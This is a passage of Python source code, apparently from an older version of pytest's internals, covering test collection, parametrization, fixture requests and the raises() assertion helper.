else:
fspath, lineno = getfslineno(obj)
modpath = self.getmodpath()
assert isinstance(lineno, int)
return fspath, lineno, modpath
class PyCollector(PyobjMixin, pytest.Collector):
def funcnamefilter(self, name):
return self._matches_prefix_or_glob_option('python_functions', name)
def isnosetest(self, obj):
""" Look for the __test__ attribute, which is applied by the
@nose.tools.istest decorator
"""
return safe_getattr(obj, '__test__', False)
def classnamefilter(self, name):
return self._matches_prefix_or_glob_option('python_classes', name)
def istestfunction(self, obj, name):
return (
(self.funcnamefilter(name) or self.isnosetest(obj))
and safe_getattr(obj, "__call__", False) and getfixturemarker(obj) is None
)
def istestclass(self, obj, name):
return self.classnamefilter(name) or self.isnosetest(obj)
def _matches_prefix_or_glob_option(self, option_name, name):
"""
checks if the given name matches the prefix or glob-pattern defined
in ini configuration.
"""
for option in self.config.getini(option_name):
if name.startswith(option):
return True
# check that name looks like a glob-string before calling fnmatch
# because this is called for every name in each collected module,
# and fnmatch is somewhat expensive to call
elif ('*' in option or '?' in option or '[' in option) and \
fnmatch.fnmatch(name, option):
return True
return False
def collect(self):
if not getattr(self.obj, "__test__", True):
return []
# NB. we avoid random getattrs and peek in the __dict__ instead
# (XXX originally introduced from a PyPy need, still true?)
dicts = [getattr(self.obj, '__dict__', {})]
for basecls in inspect.getmro(self.obj.__class__):
dicts.append(basecls.__dict__)
seen = {}
l = []
for dic in dicts:
for name, obj in dic.items():
if name in seen:
continue
seen[name] = True
res = self.makeitem(name, obj)
if res is None:
continue
if not isinstance(res, list):
res = [res]
l.extend(res)
l.sort(key=lambda item: item.reportinfo()[:2])
return l
def makeitem(self, name, obj):
#assert self.ihook.fspath == self.fspath, self
return self.ihook.pytest_pycollect_makeitem(
collector=self, name=name, obj=obj)
def _genfunctions(self, name, funcobj):
module = self.getparent(Module).obj
clscol = self.getparent(Class)
cls = clscol and clscol.obj or None
transfer_markers(funcobj, cls, module)
fm = self.session._fixturemanager
fixtureinfo = fm.getfixtureinfo(self, funcobj, cls)
metafunc = Metafunc(funcobj, fixtureinfo, self.config,
cls=cls, module=module)
methods = []
if hasattr(module, "pytest_generate_tests"):
methods.append(module.pytest_generate_tests)
if hasattr(cls, "pytest_generate_tests"):
methods.append(cls().pytest_generate_tests)
if methods:
self.ihook.pytest_generate_tests.call_extra(methods,
dict(metafunc=metafunc))
else:
self.ihook.pytest_generate_tests(metafunc=metafunc)
Function = self._getcustomclass("Function")
if not metafunc._calls:
yield Function(name, parent=self, fixtureinfo=fixtureinfo)
else:
# add funcargs() as fixturedefs to fixtureinfo.arg2fixturedefs
add_funcarg_pseudo_fixture_def(self, metafunc, fm)
for callspec in metafunc._calls:
subname = "%s[%s]" %(name, callspec.id)
yield Function(name=subname, parent=self,
callspec=callspec, callobj=funcobj,
fixtureinfo=fixtureinfo,
keywords={callspec.id:True})
def add_funcarg_pseudo_fixture_def(collector, metafunc, fixturemanager):
# this function will transform all collected calls to a functions
# if they use direct funcargs (i.e. direct parametrization)
# because we want later test execution to be able to rely on
# an existing FixtureDef structure for all arguments.
# XXX we can probably avoid this algorithm if we modify CallSpec2
# to directly care for creating the fixturedefs within its methods.
if not metafunc._calls[0].funcargs:
return # this function call does not have direct parametrization
# collect funcargs of all callspecs into a list of values
arg2params = {}
arg2scope = {}
for callspec in metafunc._calls:
for argname, argvalue in callspec.funcargs.items():
assert argname not in callspec.params
callspec.params[argname] = argvalue
arg2params_list = arg2params.setdefault(argname, [])
callspec.indices[argname] = len(arg2params_list)
arg2params_list.append(argvalue)
if argname not in arg2scope:
scopenum = callspec._arg2scopenum.get(argname,
scopenum_function)
arg2scope[argname] = scopes[scopenum]
callspec.funcargs.clear()
# register artificial FixtureDef's so that later at test execution
# time we can rely on a proper FixtureDef to exist for fixture setup.
arg2fixturedefs = metafunc._arg2fixturedefs
for argname, valuelist in arg2params.items():
# if we have a scope that is higher than function we need
# to make sure we only ever create an according fixturedef on
# a per-scope basis. We thus store and cache the fixturedef on the
# node related to the scope.
scope = arg2scope[argname]
node = None
if scope != "function":
node = get_scope_node(collector, scope)
if node is None:
assert scope == "class" and isinstance(collector, Module)
# use module-level collector for class-scope (for now)
node = collector
if node and argname in node._name2pseudofixturedef:
arg2fixturedefs[argname] = [node._name2pseudofixturedef[argname]]
else:
fixturedef = FixtureDef(fixturemanager, '', argname,
get_direct_param_fixture_func,
arg2scope[argname],
valuelist, False, False)
arg2fixturedefs[argname] = [fixturedef]
if node is not None:
node._name2pseudofixturedef[argname] = fixturedef
def get_direct_param_fixture_func(request):
return request.param
class FuncFixtureInfo:
def __init__(self, argnames, names_closure, name2fixturedefs):
self.argnames = argnames
self.names_closure = names_closure
self.name2fixturedefs = name2fixturedefs
def _marked(func, mark):
""" Returns True if :func: is already marked with :mark:, False otherwise.
This can happen if marker is applied to class and the test file is
invoked more than once.
"""
try:
func_mark = getattr(func, mark.name)
except AttributeError:
return False
return mark.args == func_mark.args and mark.kwargs == func_mark.kwargs
def transfer_markers(funcobj, cls, mod):
# XXX this should rather be code in the mark plugin or the mark
# plugin should merge with the python plugin.
for holder in (cls, mod):
try:
pytestmark = holder.pytestmark
except AttributeError:
continue
if isinstance(pytestmark, list):
for mark in pytestmark:
if not _marked(funcobj, mark):
mark(funcobj)
else:
if not _marked(funcobj, pytestmark):
pytestmark(funcobj)
class Module(pytest.File, PyCollector):
""" Collector for test classes and functions. """
def _getobj(self):
return self._memoizedcall('_obj', self._importtestmodule)
def collect(self):
self.session._fixturemanager.parsefactories(self)
return super(Module, self).collect()
def _importtestmodule(self):
# we assume we are only called once per module
try:
mod = self.fspath.pyimport(ensuresyspath="append")
except SyntaxError:
raise self.CollectError(
py.code.ExceptionInfo().getrepr(style="short"))
except self.fspath.ImportMismatchError:
e = sys.exc_info()[1]
raise self.CollectError(
"import file mismatch:\n"
"imported module %r has this __file__ attribute:\n"
" %s\n"
"which is not the same as the test file we want to collect:\n"
" %s\n"
"HINT: remove __pycache__ / .pyc files and/or use a "
"unique basename for your test file modules"
% e.args
)
#print "imported test module", mod
self.config.pluginmanager.consider_module(mod)
return mod
def setup(self):
setup_module = xunitsetup(self.obj, "setUpModule")
if setup_module is None:
setup_module = xunitsetup(self.obj, "setup_module")
if setup_module is not None:
#XXX: nose compat hack, move to nose plugin
# if it takes a positional arg, its probably a pytest style one
# so we pass the current module object
if inspect.getargspec(setup_module)[0]:
setup_module(self.obj)
else:
setup_module()
fin = getattr(self.obj, 'tearDownModule', None)
if fin is None:
fin = getattr(self.obj, 'teardown_module', None)
if fin is not None:
#XXX: nose compat hack, move to nose plugin
# if it takes a positional arg, it's probably a pytest style one
# so we pass the current module object
if inspect.getargspec(fin)[0]:
finalizer = lambda: fin(self.obj)
else:
finalizer = fin
self.addfinalizer(finalizer)
class Class(PyCollector):
""" Collector for test methods. """
def collect(self):
if hasinit(self.obj):
self.warn("C1", "cannot collect test class %r because it has a "
"__init__ constructor" % self.obj.__name__)
return []
return [self._getcustomclass("Instance")(name="()", parent=self)]
def setup(self):
setup_class = xunitsetup(self.obj, 'setup_class')
if setup_class is not None:
setup_class = getattr(setup_class, 'im_func', setup_class)
setup_class = getattr(setup_class, '__func__', setup_class)
setup_class(self.obj)
fin_class = getattr(self.obj, 'teardown_class', None)
if fin_class is not None:
fin_class = getattr(fin_class, 'im_func', fin_class)
fin_class = getattr(fin_class, '__func__', fin_class)
self.addfinalizer(lambda: fin_class(self.obj))
class Instance(PyCollector):
def _getobj(self):
obj = self.parent.obj()
return obj
def collect(self):
self.session._fixturemanager.parsefactories(self)
return super(Instance, self).collect()
def newinstance(self):
self.obj = self._getobj()
return self.obj
class FunctionMixin(PyobjMixin):
""" mixin for the code common to Function and Generator.
"""
def setup(self):
""" perform setup for this test function. """
if hasattr(self, '_preservedparent'):
obj = self._preservedparent
elif isinstance(self.parent, Instance):
obj = self.parent.newinstance()
self.obj = self._getobj()
else:
obj = self.parent.obj
if inspect.ismethod(self.obj):
setup_name = 'setup_method'
teardown_name = 'teardown_method'
else:
setup_name = 'setup_function'
teardown_name = 'teardown_function'
setup_func_or_method = xunitsetup(obj, setup_name)
if setup_func_or_method is not None:
setup_func_or_method(self.obj)
fin = getattr(obj, teardown_name, None)
if fin is not None:
self.addfinalizer(lambda: fin(self.obj))
def _prunetraceback(self, excinfo):
if hasattr(self, '_obj') and not self.config.option.fulltrace:
code = py.code.Code(get_real_func(self.obj))
path, firstlineno = code.path, code.firstlineno
traceback = excinfo.traceback
ntraceback = traceback.cut(path=path, firstlineno=firstlineno)
if ntraceback == traceback:
ntraceback = ntraceback.cut(path=path)
if ntraceback == traceback:
#ntraceback = ntraceback.cut(excludepath=cutdir2)
ntraceback = ntraceback.filter(filter_traceback)
if not ntraceback:
ntraceback = traceback
excinfo.traceback = ntraceback.filter()
# issue364: mark all but first and last frames to
# only show a single-line message for each frame
if self.config.option.tbstyle == "auto":
if len(excinfo.traceback) > 2:
for entry in excinfo.traceback[1:-1]:
entry.set_repr_style('short')
def _repr_failure_py(self, excinfo, style="long"):
if excinfo.errisinstance(pytest.fail.Exception):
if not excinfo.value.pytrace:
return str(excinfo.value)
return super(FunctionMixin, self)._repr_failure_py(excinfo,
style=style)
def repr_failure(self, excinfo, outerr=None):
assert outerr is None, "XXX outerr usage is deprecated"
style = self.config.option.tbstyle
if style == "auto":
style = "long"
return self._repr_failure_py(excinfo, style=style)
class Generator(FunctionMixin, PyCollector):
def collect(self):
# test generators are seen as collectors but they also
# invoke setup/teardown on popular request
# (induced by the common "test_*" naming shared with normal tests)
self.session._setupstate.prepare(self)
# see FunctionMixin.setup and test_setupstate_is_preserved_134
self._preservedparent = self.parent.obj
l = []
seen = {}
for i, x in enumerate(self.obj()):
name, call, args = self.getcallargs(x)
if not callable(call):
raise TypeError("%r yielded non callable test %r" %(self.obj, call,))
if name is None:
name = "[%d]" % i
else:
name = "['%s']" % name
if name in seen:
raise ValueError("%r generated tests with non-unique name %r" %(self, name))
seen[name] = True
l.append(self.Function(name, self, args=args, callobj=call))
return l
def getcallargs(self, obj):
if not isinstance(obj, (tuple, list)):
obj = (obj,)
# explict naming
if isinstance(obj[0], py.builtin._basestring):
name = obj[0]
obj = obj[1:]
else:
name = None
call, args = obj[0], obj[1:]
return name, call, args
def hasinit(obj):
init = getattr(obj, '__init__', None)
if init:
if init != object.__init__:
return True
def fillfixtures(function):
""" fill missing funcargs for a test function. """
try:
request = function._request
except AttributeError:
# XXX this special code path is only expected to execute
# with the oejskit plugin. It uses classes with funcargs
# and we thus have to work a bit to allow this.
fm = function.session._fixturemanager
fi = fm.getfixtureinfo(function.parent, function.obj, None)
function._fixtureinfo = fi
request = function._request = FixtureRequest(function)
request._fillfixtures()
# prune out funcargs for jstests
newfuncargs = {}
for name in fi.argnames:
newfuncargs[name] = function.funcargs[name]
function.funcargs = newfuncargs
else:
request._fillfixtures()
_notexists = object()
class CallSpec2(object):
def __init__(self, metafunc):
self.metafunc = metafunc
self.funcargs = {}
self._idlist = []
self.params = {}
self._globalid = _notexists
self._globalid_args = set()
self._globalparam = _notexists
self._arg2scopenum = {} # used for sorting parametrized resources
self.keywords = {}
self.indices = {}
def copy(self, metafunc):
cs = CallSpec2(self.metafunc)
cs.funcargs.update(self.funcargs)
cs.params.update(self.params)
cs.keywords.update(self.keywords)
cs.indices.update(self.indices)
cs._arg2scopenum.update(self._arg2scopenum)
cs._idlist = list(self._idlist)
cs._globalid = self._globalid
cs._globalid_args = self._globalid_args
cs._globalparam = self._globalparam
return cs
def _checkargnotcontained(self, arg):
if arg in self.params or arg in self.funcargs:
raise ValueError("duplicate %r" %(arg,))
def getparam(self, name):
try:
return self.params[name]
except KeyError:
if self._globalparam is _notexists:
raise ValueError(name)
return self._globalparam
@property
def id(self):
return "-".join(map(str, filter(None, self._idlist)))
def setmulti(self, valtypes, argnames, valset, id, keywords, scopenum,
param_index):
for arg,val in zip(argnames, valset):
self._checkargnotcontained(arg)
valtype_for_arg = valtypes[arg]
getattr(self, valtype_for_arg)[arg] = val
self.indices[arg] = param_index
self._arg2scopenum[arg] = scopenum
if val is _notexists:
self._emptyparamspecified = True
self._idlist.append(id)
self.keywords.update(keywords)
def setall(self, funcargs, id, param):
for x in funcargs:
self._checkargnotcontained(x)
self.funcargs.update(funcargs)
if id is not _notexists:
self._idlist.append(id)
if param is not _notexists:
assert self._globalparam is _notexists
self._globalparam = param
for arg in funcargs:
self._arg2scopenum[arg] = scopenum_function
class FuncargnamesCompatAttr:
""" helper class so that Metafunc, Function and FixtureRequest
don't need to each define the "funcargnames" compatibility attribute.
"""
@property
def funcargnames(self):
""" alias attribute for ``fixturenames`` for pre-2.3 compatibility"""
return self.fixturenames
class Metafunc(FuncargnamesCompatAttr):
"""
Metafunc objects are passed to the ``pytest_generate_tests`` hook.
They help to inspect a test function and to generate tests according to
test configuration or values specified in the class or module where a
test function is defined.
:ivar fixturenames: set of fixture names required by the test function
:ivar function: underlying python test function
:ivar cls: class object where the test function is defined in or ``None``.
:ivar module: the module object where the test function is defined in.
:ivar config: access to the :class:`_pytest.config.Config` object for the
test session.
:ivar funcargnames:
.. deprecated:: 2.3
Use ``fixturenames`` instead.
"""
def __init__(self, function, fixtureinfo, config, cls=None, module=None):
self.config = config
self.module = module
self.function = function
self.fixturenames = fixtureinfo.names_closure
self._arg2fixturedefs = fixtureinfo.name2fixturedefs
self.cls = cls
self._calls = []
self._ids = py.builtin.set()
def parametrize(self, argnames, argvalues, indirect=False, ids=None,
scope=None):
""" Add new invocations to the underlying test function using the list
of argvalues for the given argnames. Parametrization is performed
during the collection phase. If you need to setup expensive resources
see about setting indirect to do it rather at test setup time.
:arg argnames: a comma-separated string denoting one or more argument
names, or a list/tuple of argument strings.
:arg argvalues: The list of argvalues determines how often a
test is invoked with different argument values. If only one
argname was specified argvalues is a list of simple values. If N
argnames were specified, argvalues must be a list of N-tuples,
where each tuple-element specifies a value for its respective
argname.
:arg indirect: The list of argnames or boolean. A list of arguments'
names (subset of argnames). If True the list contains all names from
the argnames. Each argvalue corresponding to an argname in this list will
be passed as request.param to its respective argname fixture
function so that it can perform more expensive setups during the
setup phase of a test rather than at collection time.
:arg ids: list of string ids, or a callable.
If strings, each is corresponding to the argvalues so that they are
part of the test id.
If callable, it should take one argument (a single argvalue) and return
a string or return None. If None, the automatically generated id for that
argument will be used.
If no ids are provided they will be generated automatically from
the argvalues.
:arg scope: if specified it denotes the scope of the parameters.
The scope is used for grouping tests by parameter instances.
It will also override any fixture-function defined scope, allowing
to set a dynamic scope using test context or configuration.
"""
# individual parametrized argument sets can be wrapped in a series
# of markers in which case we unwrap the values and apply the mark
# at Function init
newkeywords = {}
unwrapped_argvalues = []
for i, argval in enumerate(argvalues):
while isinstance(argval, MarkDecorator):
newmark = MarkDecorator(argval.markname,
argval.args[:-1], argval.kwargs)
newmarks = newkeywords.setdefault(i, {})
newmarks[newmark.markname] = newmark
argval = argval.args[-1]
unwrapped_argvalues.append(argval)
argvalues = unwrapped_argvalues
if not isinstance(argnames, (tuple, list)):
argnames = [x.strip() for x in argnames.split(",") if x.strip()]
if len(argnames) == 1:
argvalues = [(val,) for val in argvalues]
if not argvalues:
argvalues = [(_notexists,) * len(argnames)]
if scope is None:
scope = "function"
scopenum = scopes.index(scope)
valtypes = {}
for arg in argnames:
if arg not in self.fixturenames:
raise ValueError("%r uses no fixture %r" %(self.function, arg))
if indirect is True:
valtypes = dict.fromkeys(argnames, "params")
elif indirect is False:
valtypes = dict.fromkeys(argnames, "funcargs")
elif isinstance(indirect, (tuple, list)):
valtypes = dict.fromkeys(argnames, "funcargs")
for arg in indirect:
if arg not in argnames:
raise ValueError("indirect given to %r: fixture %r doesn't exist" %(
self.function, arg))
valtypes[arg] = "params"
idfn = None
if callable(ids):
idfn = ids
ids = None
if ids and len(ids) != len(argvalues):
raise ValueError('%d tests specified with %d ids' %(
len(argvalues), len(ids)))
if not ids:
ids = idmaker(argnames, argvalues, idfn)
newcalls = []
for callspec in self._calls or [CallSpec2(self)]:
for param_index, valset in enumerate(argvalues):
assert len(valset) == len(argnames)
newcallspec = callspec.copy(self)
newcallspec.setmulti(valtypes, argnames, valset, ids[param_index],
newkeywords.get(param_index, {}), scopenum,
param_index)
newcalls.append(newcallspec)
self._calls = newcalls
def addcall(self, funcargs=None, id=_notexists, param=_notexists):
""" (deprecated, use parametrize) Add a new call to the underlying
test function during the collection phase of a test run. Note that
request.addcall() is called during the test collection phase prior and
independently to actual test execution. You should only use addcall()
if you need to specify multiple arguments of a test function.
:arg funcargs: argument keyword dictionary used when invoking
the test function.
:arg id: used for reporting and identification purposes. If you
don't supply an `id` an automatic unique id will be generated.
:arg param: a parameter which will be exposed to a later fixture function
invocation through the ``request.param`` attribute.
"""
assert funcargs is None or isinstance(funcargs, dict)
if funcargs is not None:
for name in funcargs:
if name not in self.fixturenames:
pytest.fail("funcarg %r not used in this function." % name)
else:
funcargs = {}
if id is None:
raise ValueError("id=None not allowed")
if id is _notexists:
id = len(self._calls)
id = str(id)
if id in self._ids:
raise ValueError("duplicate id %r" % id)
self._ids.add(id)
cs = CallSpec2(self)
cs.setall(funcargs, id, param)
self._calls.append(cs)
def _idval(val, argname, idx, idfn):
if idfn:
try:
s = idfn(val)
if s:
return s
except Exception:
pass
if isinstance(val, (float, int, str, bool, NoneType)):
return str(val)
elif isinstance(val, REGEX_TYPE):
return val.pattern
elif enum is not None and isinstance(val, enum.Enum):
return str(val)
elif isclass(val) and hasattr(val, '__name__'):
return val.__name__
return str(argname)+str(idx)
def _idvalset(idx, valset, argnames, idfn):
this_id = [_idval(val, argname, idx, idfn)
for val, argname in zip(valset, argnames)]
return "-".join(this_id)
def idmaker(argnames, argvalues, idfn=None):
ids = [_idvalset(valindex, valset, argnames, idfn)
for valindex, valset in enumerate(argvalues)]
if len(set(ids)) < len(ids):
# user may have provided a bad idfn which means the ids are not unique
ids = [str(i) + testid for i, testid in enumerate(ids)]
return ids
def showfixtures(config):
from _pytest.main import wrap_session
return wrap_session(config, _showfixtures_main)
def _showfixtures_main(config, session):
import _pytest.config
session.perform_collect()
curdir = py.path.local()
tw = _pytest.config.create_terminal_writer(config)
verbose = config.getvalue("verbose")
fm = session._fixturemanager
available = []
for argname, fixturedefs in fm._arg2fixturedefs.items():
assert fixturedefs is not None
if not fixturedefs:
continue
fixturedef = fixturedefs[-1]
loc = getlocation(fixturedef.func, curdir)
available.append((len(fixturedef.baseid),
fixturedef.func.__module__,
curdir.bestrelpath(loc),
fixturedef.argname, fixturedef))
available.sort()
currentmodule = None
for baseid, module, bestrel, argname, fixturedef in available:
if currentmodule != module:
if not module.startswith("_pytest."):
tw.line()
tw.sep("-", "fixtures defined from %s" %(module,))
currentmodule = module
if verbose <= 0 and argname[0] == "_":
continue
if verbose > 0:
funcargspec = "%s -- %s" %(argname, bestrel,)
else:
funcargspec = argname
tw.line(funcargspec, green=True)
loc = getlocation(fixturedef.func, curdir)
doc = fixturedef.func.__doc__ or ""
if doc:
for line in doc.strip().split("\n"):
tw.line(" " + line.strip())
else:
tw.line(" %s: no docstring available" %(loc,),
red=True)
def getlocation(function, curdir):
import inspect
fn = py.path.local(inspect.getfile(function))
lineno = py.builtin._getcode(function).co_firstlineno
if fn.relto(curdir):
fn = fn.relto(curdir)
return "%s:%d" %(fn, lineno+1)
def raises(expected_exception, *args, **kwargs):
""" assert that a code block/function call raises @expected_exception
and raise a failure exception otherwise.
This helper produces a ``py.code.ExceptionInfo()`` object.
If using Python 2.5 or above, you may use this function as a
context manager::
>>> with raises(ZeroDivisionError):
... 1/0
Or you can specify a callable by passing a to-be-called lambda::
>>> raises(ZeroDivisionError, lambda: 1/0)
<ExceptionInfo ...>
or you can specify an arbitrary callable with arguments::
>>> def f(x): return 1/x
...
>>> raises(ZeroDivisionError, f, 0)
<ExceptionInfo ...>
>>> raises(ZeroDivisionError, f, x=0)
<ExceptionInfo ...>
A third possibility is to use a string to be executed::
>>> raises(ZeroDivisionError, "f(0)")
<ExceptionInfo ...>
Performance note:
-----------------
Similar to caught exception objects in Python, explicitly clearing
local references to returned ``py.code.ExceptionInfo`` objects can
help the Python interpreter speed up its garbage collection.
Clearing those references breaks a reference cycle
(``ExceptionInfo`` --> caught exception --> frame stack raising
the exception --> current frame stack --> local variables -->
``ExceptionInfo``) which makes Python keep all objects referenced
from that cycle (including all local variables in the current
frame) alive until the next cyclic garbage collection run. See the
official Python ``try`` statement documentation for more detailed
information.
"""
__tracebackhide__ = True
if expected_exception is AssertionError:
# we want to catch a AssertionError
# replace our subclass with the builtin one
# see https://github.com/pytest-dev/pytest/issues/176
from _pytest.assertion.util import BuiltinAssertionError \
as expected_exception
msg = ("exceptions must be old-style classes or"
" derived from BaseException, not %s")
if isinstance(expected_exception, tuple):
for exc in expected_exception:
if not isclass(exc):
raise TypeError(msg % type(exc))
elif not isclass(expected_exception):
raise TypeError(msg % type(expected_exception))
if not args:
return RaisesContext(expected_exception)
elif isinstance(args[0], str):
code, = args
assert isinstance(code, str)
frame = sys._getframe(1)
loc = frame.f_locals.copy()
loc.update(kwargs)
#print "raises frame scope: %r" % frame.f_locals
try:
code = py.code.Source(code).compile()
py.builtin.exec_(code, frame.f_globals, loc)
# XXX didn'T mean f_globals == f_locals something special?
# this is destroyed here ...
except expected_exception:
return py.code.ExceptionInfo()
else:
func = args[0]
try:
func(*args[1:], **kwargs)
except expected_exception:
return py.code.ExceptionInfo()
pytest.fail("DID NOT RAISE")
class RaisesContext(object):
def __init__(self, expected_exception):
self.expected_exception = expected_exception
self.excinfo = None
def __enter__(self):
self.excinfo = object.__new__(py.code.ExceptionInfo)
return self.excinfo
def __exit__(self, *tp):
__tracebackhide__ = True
if tp[0] is None:
pytest.fail("DID NOT RAISE")
if sys.version_info < (2, 7):
# py26: on __exit__() exc_value often does not contain the
# exception value.
# http://bugs.python.org/issue7853
if not isinstance(tp[1], BaseException):
exc_type, value, traceback = tp
tp = exc_type, exc_type(value), traceback
self.excinfo.__init__(tp)
return issubclass(self.excinfo.type, self.expected_exception)
class Function(FunctionMixin, pytest.Item, FuncargnamesCompatAttr):
""" a Function Item is responsible for setting up and executing a
Python test function.
"""
_genid = None
def __init__(self, name, parent, args=None, config=None,
callspec=None, callobj=NOTSET, keywords=None, session=None,
fixtureinfo=None):
super(Function, self).__init__(name, parent, config=config,
session=session)
self._args = args
if callobj is not NOTSET:
self.obj = callobj
self.keywords.update(self.obj.__dict__)
if callspec:
self.callspec = callspec
self.keywords.update(callspec.keywords)
if keywords:
self.keywords.update(keywords)
if fixtureinfo is None:
fixtureinfo = self.session._fixturemanager.getfixtureinfo(
self.parent, self.obj, self.cls,
funcargs=not self._isyieldedfunction())
self._fixtureinfo = fixtureinfo
self.fixturenames = fixtureinfo.names_closure
self._initrequest()
def _initrequest(self):
self.funcargs = {}
if self._isyieldedfunction():
assert not hasattr(self, "callspec"), (
"yielded functions (deprecated) cannot have funcargs")
else:
if hasattr(self, "callspec"):
callspec = self.callspec
assert not callspec.funcargs
self._genid = callspec.id
if hasattr(callspec, "param"):
self.param = callspec.param
self._request = FixtureRequest(self)
@property
def function(self):
"underlying python 'function' object"
return getattr(self.obj, 'im_func', self.obj)
def _getobj(self):
name = self.name
i = name.find("[") # parametrization
if i != -1:
name = name[:i]
return getattr(self.parent.obj, name)
@property
def _pyfuncitem(self):
"(compatonly) for code expecting pytest-2.2 style request objects"
return self
def _isyieldedfunction(self):
return getattr(self, "_args", None) is not None
def runtest(self):
""" execute the underlying test function. """
self.ihook.pytest_pyfunc_call(pyfuncitem=self)
def setup(self):
# check if parametrization happend with an empty list
try:
self.callspec._emptyparamspecified
except AttributeError:
pass
else:
fs, lineno = self._getfslineno()
pytest.skip("got empty parameter set, function %s at %s:%d" %(
self.function.__name__, fs, lineno))
super(Function, self).setup()
fillfixtures(self)
scope2props = dict(session=())
scope2props["module"] = ("fspath", "module")
scope2props["class"] = scope2props["module"] + ("cls",)
scope2props["instance"] = scope2props["class"] + ("instance", )
scope2props["function"] = scope2props["instance"] + ("function", "keywords")
def scopeproperty(name=None, doc=None):
def decoratescope(func):
scopename = name or func.__name__
def provide(self):
if func.__name__ in scope2props[self.scope]:
return func(self)
raise AttributeError("%s not available in %s-scoped context" % (
scopename, self.scope))
return property(provide, None, None, func.__doc__)
return decoratescope
class FixtureRequest(FuncargnamesCompatAttr):
""" A request for a fixture from a test or fixture function.
A request object gives access to the requesting test context
and has an optional ``param`` attribute in case
the fixture is parametrized indirectly.
"""
def __init__(self, pyfuncitem):
self._pyfuncitem = pyfuncitem
#: fixture for which this request is being performed
self.fixturename = None
#: Scope string, one of "function", "cls", "module", "session"
self.scope = "function"
self._funcargs = {}
self._fixturedefs = {}
fixtureinfo = pyfuncitem._fixtureinfo
self._arg2fixturedefs = fixtureinfo.name2fixturedefs.copy()
self._arg2index = {}
self.fixturenames = fixtureinfo.names_closure
self._fixturemanager = pyfuncitem.session._fixturemanager
@property
def node(self):
""" underlying collection node (depends on current request scope)"""
return self._getscopeitem(self.scope)
def _getnextfixturedef(self, argname):
fixturedefs = self._arg2fixturedefs.get(argname, None)
if fixturedefs is None:
# we arrive here because of a a dynamic call to
# getfuncargvalue(argname) usage which was naturally
# not known at parsing/collection time
fixturedefs = self._fixturemanager.getfixturedefs(
argname, self._pyfuncitem.parent.nodeid)
self._arg2fixturedefs[argname] = fixturedefs
# fixturedefs list is immutable so we maintain a decreasing index
index = self._arg2index.get(argname, 0) - 1
if fixturedefs is None or (-index > len(fixturedefs)):
raise FixtureLookupError(argname, self)
self._arg2index[argname] = index
return fixturedefs[index]
@property
def config(self):
""" the pytest config object associated with this request. """
return self._pyfuncitem.config
@scopeproperty()
def function(self):
""" test function object if the request has a per-function scope. """
return self._pyfuncitem.obj
@scopeproperty("class")
def cls(self):
""" class (can be None) where the test function was collected. """
clscol = self._pyfuncitem.getparent(pytest.Class)
if clscol:
return clscol.obj
@property
def instance(self):
""" instance (can be None) on which test function was collected. """
# unittest support hack, see _pytest.unittest.TestCaseFunction
try:
return self._pyfuncitem._testcase
except AttributeError:
function = getattr(self, "function", None)
if function is not None:
return py.builtin._getimself(function)
@scopeproperty()
def module(self):
""" python module object where the test function was collected. """
return self._pyfuncitem.getparent(pytest.Module).obj
@scopeproperty()
def fspath(self):
""" the file system path of the test module which collected this test. """
return self._pyfuncitem.fspath
@property
def keywords(self):
""" keywords/markers dictionary for the underlying node. """
return self.node.keywords
@property
def session(self):
""" pytest session object. """
return self._pyfuncitem.session
def addfinalizer(self, finalizer):
""" add finalizer/teardown function to be called after the
last test within the requesting test context finished
execution. """
# XXX usually this method is shadowed by fixturedef specific ones
self._addfinalizer(finalizer, scope=self.scope)
def _addfinalizer(self, finalizer, scope):
colitem = self._getscopeitem(scope)
self._pyfuncitem.session._setupstate.addfinalizer(
finalizer=finalizer, colitem=colitem)
def applymarker(self, marker):
""" Apply a marker to a single test function invocation.
This method is useful if you don't want to have a keyword/marker
on all function invocations.
:arg marker: a :py:class:`_pytest.mark.MarkDecorator` object
created by a call to ``pytest.mark.NAME(...)``.
"""
try:
self.node.keywords[marker.markname] = marker
except AttributeError:
raise ValueError(marker)
def raiseerror(self, msg):
""" raise a FixtureLookupError with the given message. """
raise self._fixturemanager.FixtureLookupError(None, self, msg)
def _fillfixtures(self):
item = self._pyfuncitem
fixturenames = getattr(item, "fixturenames", self.fixturenames)
for argname in fixturenames:
if argname not in item.funcargs:
item.funcargs[argname] = self.getfuncargvalue(argname)
def cached_setup(self, setup, teardown=None, scope="module", extrakey=None):
""" (deprecated) Return a testing resource managed by ``setup`` &
``teardown`` calls. ``scope`` and ``extrakey`` determine when the
``teardown`` function will be called so that subsequent calls to
``setup`` would recreate the resource. With pytest-2.3 you often
do not need ``cached_setup()`` as you can directly declare a scope
on a fixture function and register a finalizer through
``request.addfinalizer()``.
:arg teardown: function receiving a previously setup resource.
:arg setup: a no-argument function creating a resource.
:arg scope: a string value out of ``function``, ``class``, ``module``
or ``session`` indicating the caching lifecycle of the resource.
:arg extrakey: added to internal caching key of (funcargname, scope).
"""
if not hasattr(self.config, '_setupcache'):
self.config._setupcache = {} # XXX weakref?
cachekey = (self.fixturename, self._getscopeitem(scope), extrakey)
cache = self.config._setupcache
try:
val = cache[cachekey]
except KeyError:
self._check_scope(self.fixturename, self.scope, scope)
val = setup()
cache[cachekey] = val
if teardown is not None:
def finalizer():
del cache[cachekey]
teardown(val)
self._addfinalizer(finalizer, scope=scope)
return val
def getfuncargvalue(self, argname):
""" Dynamically retrieve a named fixture function argument.
As of pytest-2.3, it is easier and usually better to access other
fixture values by stating it as an input argument in the fixture
function. If you only can decide about using another fixture at test
setup time, you may use this function to retrieve it inside a fixture
function body.
"""
return self._get_active_fixturedef(argname).cached_result[0]
def _get_active_fixturedef(self, argname):
try:
return self._fixturedefs[argname]
except KeyError:
try:
fixturedef = self._getnextfixturedef(argname)
except FixtureLookupError:
if argname == "request":
class PseudoFixtureDef:
cached_result = (self, [0], None)
scope = "function"
return PseudoFixtureDef
raise
# remove indent to prevent the python3 exception
# from leaking into the call
result = self._getfuncargvalue(fixturedef)
self._funcargs[argname] = result
self._fixturedefs[argname] = fixturedef
return fixturedef
def _get_fixturestack(self):
current = self
l = []
while 1:
fixturedef = getattr(current, "_fixturedef", None)
if fixturedef is None:
l.reverse()
return l
l.append(fixturedef)
current = current._parent_request
def _getfuncargvalue(self, fixturedef):
# prepare a subrequest object before calling fixture function
# (latter managed by fixturedef)
argname = fixturedef.argname
funcitem = self._pyfuncitem
scope = fixturedef.scope
try:
param = funcitem.callspec.getparam(argname)
except (AttributeError, ValueError):
param = NOTSET
param_index = 0
else:
# indices might not be set if old-style metafunc.addcall() was used
